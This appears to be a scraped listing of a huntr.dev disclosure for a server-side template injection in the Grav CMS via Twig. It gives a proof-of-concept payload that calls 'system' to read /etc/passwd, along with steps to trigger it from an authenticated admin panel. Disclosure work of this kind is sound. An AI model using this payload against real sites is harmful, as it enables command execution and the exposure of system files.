Lucene search

K
huntrEffectrenan3EF640E6-9E25-4ECB-8EC1-64311D63FE66
HistoryApr 07, 2022 - 9:45 p.m.

Server Side Template Injection

2022-04-0721:45:14
effectrenan
www.huntr.dev
14
grav
server side template injection
twig
vulnerability
poc
admin panel

EPSS

0.001

Percentile

41.2%

Description

Grav is vulnerable to Server Side Template Injection via Twig. According to a previous vulnerability report, Twig should not render dangerous functions by default, such as system.

PoC video.

Proof of Concept

Payload:

{{['cat\x20/etc/passwd']|filter('system')}}
  1. With an authenticated user, access the admin panel.
  2. Edit a page, enabling Twig in the Advanced tab.
  3. Put the payload in the content.
  4. Save and check out the post.

EPSS

0.001

Percentile

41.2%

Related for 3EF640E6-9E25-4ECB-8EC1-64311D63FE66